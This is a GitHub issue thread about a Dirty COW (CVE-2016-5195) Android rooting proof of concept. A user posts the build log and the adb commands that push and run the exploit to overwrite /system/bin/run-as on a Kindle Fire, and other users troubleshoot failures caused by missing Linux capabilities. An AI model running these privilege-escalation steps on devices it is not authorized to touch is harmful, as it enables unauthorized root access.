search

timwr / CVE-2016-5195

CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android
959 stars 395 forks source link

Issues on Kindle Fire 5thgen (KFFOWI) #8

Closed aidanbh closed 8 years ago

aidanbh commented 8 years ago

My device hardreboots as soon as the exploit finishes, leading to the following output: Any suggestions?

[bithakr@localhost CVE-2016-5195]$ make run
make: *** No rule to make target 'run'.  Stop.
[bithakr@localhost CVE-2016-5195]$ make root
ndk-build NDK_PROJECT_PATH=. APP_BUILD_SCRIPT=./Android.mk APP_PLATFORM=android-21
make[1]: Entering directory '/home/bithakr/dev/CVE-2016-5195'
[arm64-v8a] Install        : dirtycow => libs/arm64-v8a/dirtycow
[arm64-v8a] Install        : run-as => libs/arm64-v8a/run-as
[x86_64] Install        : dirtycow => libs/x86_64/dirtycow
[x86_64] Install        : run-as => libs/x86_64/run-as
[mips64] Install        : dirtycow => libs/mips64/dirtycow
[mips64] Install        : run-as => libs/mips64/run-as
[armeabi-v7a] Install        : dirtycow => libs/armeabi-v7a/dirtycow
[armeabi-v7a] Install        : run-as => libs/armeabi-v7a/run-as
[armeabi] Install        : dirtycow => libs/armeabi/dirtycow
[armeabi] Install        : run-as => libs/armeabi/run-as
[x86] Install        : dirtycow => libs/x86/dirtycow
[x86] Install        : run-as => libs/x86/run-as
[mips] Install        : dirtycow => libs/mips/dirtycow
[mips] Install        : run-as => libs/mips/run-as
make[1]: Leaving directory '/home/bithakr/dev/CVE-2016-5195'
adb push libs/armeabi/dirtycow /data/local/tmp/dirtycow
[100%] /data/local/tmp/dirtycow
adb push libs/armeabi/run-as /data/local/tmp/run-as
[100%] /data/local/tmp/run-as
adb shell 'chmod 777 /data/local/tmp/run-as'
adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as'
WARNING: linker: /data/local/tmp/dirtycow: unused DT entry: type 0x6ffffffe arg 0x600
WARNING: linker: /data/local/tmp/dirtycow: unused DT entry: type 0x6fffffff arg 0x1
warning: new file size (13776) and file old size (9444) differ

size 13776

[*] mmap 0xb6f2c000
[*] exploit (patch)
[*] currently 0xb6f2c000=464c457f
[*] madvise = 0xb6f2c000 13776
[*] madvise = 0 1048576
adb shell /system/bin/run-as
error: no devices/emulators found
make: *** [Makefile:14: root] Error 1
aidanbh commented 8 years ago

It doesn't look like run-as is setuid on my device (but how else would it work? -rwxr-x--- root shell 9444 2016-06-24 15:13 run-as

joel0 commented 8 years ago

Linux capabilities is how the UID can be set without the setuid bit.

BsnNick commented 8 years ago

@bithakr I am getting the same issue. I get the same permission in /system/bin for run-as, even after setting it to 777 in /data/local/tmp.

Edit: I also have to set dirtycow file to 777 in /data/local/tmp for this PoC to run, otherwise I get "can't execute: Permission denied." I am using a Verizon SnapDragon Galaxy S7 Edge by the way.

timwr commented 8 years ago

@bithakr it looks like the device is vulnerable but I don't think it has linux capabilities (< 4.2?). Maybe you can try https://github.com/timwr/CVE-2016-5195/tree/oldcow (or just comment out the capset stuff in run-as.c). Many thanks

aidanbh commented 8 years ago

@timwr That makes sense. I found another way to root my device but I'll try your suggestion to see if it works. It doesn't have Linux capabilities. The base OS in Android 5.0.1 - it runs FireOS 5.3.1.